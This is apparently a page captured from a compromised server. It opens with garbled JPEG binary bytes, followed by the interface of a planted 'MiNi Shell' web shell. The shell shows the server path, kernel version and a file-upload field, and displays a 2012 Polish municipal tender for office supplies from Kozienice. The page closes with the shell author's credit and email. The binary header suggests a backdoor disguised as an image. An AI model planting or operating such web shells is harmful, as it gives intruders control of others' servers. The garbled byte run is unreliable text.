JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/26097-N-2012.html

<p class="kh_header"><b>Kozienice: Dostawa materiałów biurowych i papieru dla Urzędu Miejskiego w Kozienicach</b><br>
<b>Numer ogłoszenia: 26097 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papieru dla Urzędu Miejskiego w Kozienicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS  PRZEDMIOTU  ZAMÓWIENIA
1.  Nazwa zamówienia nadana przez Zamawiającego: Dostawa materiałów biurowych i papieru dla Urzędu Miejskiego w Kozienicach.
2.  Zamówienie dotyczy dostawy poszczególnych asortymentów przedmiotu zamówienia       zgodnie z bieżącym zapotrzebowaniem Zamawiającego. 
3.  Materiały podane w treści opisu przedmiotu zamówienia nie są bezwzględnie  obowiązujące, dopuszcza się artykuły równoważne jakością lub lepsze.
4.  Towar uważa się za dostarczony, jeżeli będzie dowieziony, złożony w miejscu wskazanym  przez Zamawiającego, przeliczony i sprawdzony w obecności Zamawiającego i Wykonawcy oraz potwierdzony na dokumencie dostawy przez Zamawiającego.	
5.  Zamawiający przewiduje udzielenia zamówienia uzupełniającego o którym mowa w art.      67 ust.pkt.7
6.  Przedmiot zamówienia obejmuje:
6.1.Notatnik z wyrywanymi kartkami A-4 - 100 kartek 30192000-1 szt. 120, 6.2.Notatnik z wyrywanymi kartkami  A-5 - 100 kartek 30192000-1 szt. 50, 6.3.Cienkopisy typu STABILO (czarny, czerwony, niebieski, zielony) grubość linii  0,4 mm 30192125-3 szt. 300,               6.4. Długopisy typu PENTEL  żelowe* 30192121-5 szt. 500, 6.5.Długopisy typu PENAC RB-085  30192123-9 szt. 250, 6.6.Długopis typu S-FINE 059  30192123-9 szt. 500, 6.7.Długopis z przymocowaniem do blatu typu Luxus 30192123-9 szt. 200, 6.8.Długopis typu BIG CRISTAL medium 30192123-9 szt. 500, 6.9.Grzbiety do bindownicy Nr  10,14,16,,20,25,28. 30192000-1 op. 6, 6.10.Gumki ołówkowe typu PENTEL 30192100-2 szt. 200, 6.11.Koszulki do segregatorów  A-4 groszkowa 48 mikronów 1 opak. - 100 szt. 30192000-1 op. 100, 6.12.Koszulki z perforacją do wpinania A-4 30192000-1 szt.500, 6.13.Klej w sztyfcie 25 g. typu HINOL 30192000-1 szt.400, 6.14.Korektor w taśmie 30192160-0 szt. 200,                6.15. Korektor w płynie 30192160-0 szt. 200, 6.16.Koperty białe pakowane po 250 szt. B-4 samoprzylepne 30199230-1 op. 4, 6.17.Koperty białe C-6 samoprzylepne pakowane po 1000 szt. 30199230-1 op. 40, 6.18. Koperty białe C-5 samoprzylepne pakowane po 500 szt. 30199230-1 op.10, 6.19.Koperty białe C-4 samoprzylepne pakowane po 250 szt. 30199230-1 op. 8, 6.20.Koperta bąbelkowa propac A - 5 30199230-1 szt.500, 6.21.Koperta CD NK biała 30199230-1 szt.	200, 6.22.Kostka kolorowa samoprzylepna 30192000-1 szt.400, 6.23.Kostka kolorowa	30192000-1 szt.300, 6.24.Klamry klipy 51 mm w opakowaniu 12 szt. 30197110-0 op.25, 6.25.Klamry klipy 41 mm w opakowaniu 12 szt. 30197110-0 op.20, 6.26.Klamry klipy 32 mm w opakowaniu  12 szt. 30197110-0 op.20, 6.27.Klamry klipy 25 mm w opakowaniu 12 szt. 30197110-0 op.35, 6.28.Klamry klipy 19 mm w opakowaniu 12 szt. 30197110-0 op.30, 6.29.Klamry klipy 15 mm w opakowaniu 12 szt. 30197110-0 op.20,    6.30.Linijka 30 cm plastikowa kolorowa 30192000-1 szt. 100, 6.31.Zakreślacz typu  DONAU  kolorowy 30192000-1 szt.150, 6.32.Marker typu PENTEL wodoodporny-czarny 30192000-1 szt.100, 6.33.Marker CD/DVD  M854 czarny 30192000-1 szt. 100, 6.34.Ofertówka A-4 30192500-6 szt.500, 6.35.Ołówek zwykły 2B 30192130-1 szt.300, 6.36.Ołówek automat typu PENAC  RB-085M 30192131-8 szt. 200, 6.37.Spinacze biurowy 28 mm opakowanie 100 szt. 30197220-4 op. 300, 6.38.Spinacze 50 mm opakowanie 100 szt. 30197220-4 op.100, 6.39.Skoroszyty plastikowe sztywne kolorowe A-4	30197210-1 szt. 500, 6.40.Skoroszyty plastikowy sztywny z europerforacją kolorowy A-4 30197210-1 szt.500, 6.41.Skoroszyty do segregatorów papierowe gramatura 300 g. 30197210-1 szt. 500, 6.42.Skoroszyt papierowy gramatura 300g 30197210-1 szt. 1500, 6.43.Segregatory A-4 szer.7 cm oklejane polipropylenem a wewnątrz karton  różne kolory z wymienną kartą opisową 30199500-5 szt.500, 6.44.Segregatory A-4 szer 5 cm  laminowane różne kolory z wymienną kartą opisową 30199500-5 szt. 500, 6.45.Segregator PP Panorama biały A4 /4DR/50 typu ESSELTE 30199500-5 szt. 30, 6.46.Segregator PP Panorama biały A4 /4R/25MM typu ESSELTE 30199500-5 szt.30, 6.47.Sznurek jutowy 10DKG 30197000-6 szt.130, 6.48.Teczki z gumką biała gramatura 300g 30197610-5 szt. 500, 6.49.Teczka wiązana biała gramatura 300 g 30197610-5 szt.2000, 6.50.Taśma do maszyna licz. (57) Rolka Dalton 30145100-8 szt. 500, 6.51.Taśma biurowa samoklejąca przezroczysta 18x10 22853000-4 szt. 200, 6.52.Wkłady do ołówków typu PENAC RB -085M (grafit) 0,5  30192132-5 szt.100, 6.53.Wkłady do długopisów typu PENTEL żelowe (niebieski, czarny) 30192000-1 szt.100, 6.54.Wkłady  zwykłe 30192000-1 szt.100, 6.55.Wkłady do długopisów PENAC/nieb,czarny/ 30192000-1 szt.100, 6.56.Zszywki 24/6 opakowanie 1000 szt.30197100-7 op. 200,          6.57.Zeszyt B-5 160 kart. (kratka) - twarda oprawa	30192000-1 szt. 20, 6.58.Zeszyt A-5 96         (twarda opr.) 30192000-1 szt.100, 6.59.Zeszyt A-5 16 kart. 30192000-1 szt.100, 6.60.Zeszyt A-5 32 kart. 30192000-1 szt.50, 6.61.Zeszyt  A-4 96 kart. Twarda oprawa 30192000-1 szt. 150, 6.62.Wąsy skoroszytowe 30192000-1 szt. 250, 6.63.Papier A-4  500/A4/80g/m typu Pollux Klasa B , Białość CIE 161 Jasność D 65 z UV% 110?2 Wilg. 3,0 - 5,0% , Grubość ?m 104?3 ,Nieprzezroczystość 92 %, Gładkość cm3/1min 220?60Dołączyć specyfikację papieru Xero 30197644-2 Ryza 2500, 6.64.Papier A-3  500/A3/80g/m jakość j.w. 30197644-2 Ryza 150, 6.65.Papier A-5 500/A5/80g/m jakość j.w. 30197644-2 Ryza 100, 6.66.Karton wizytówkowy A-4 gramatura 230g/m2  30199310-6 szt. 2000, 6.67.Papier do plotera format A-1 gramatura 80g/m2 30197644-2 rolka 5, 6.68.Papier do plotera format A-0 gramatura 80g/m2 30197644-2 rolka 5..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówienia uzupełniającego o którym mowa w  
art. 67 ust. 1 pkt.7. do wysokości 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.76.44-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	stosowane Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
2)	dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach ul. Parkoawa 5, 26-900 Kozienice, pok nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 11:45, miejsce: Urząd Miejski w Kozienicach ul. Parkowa 5, 26-900 Kozienice, pok. 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com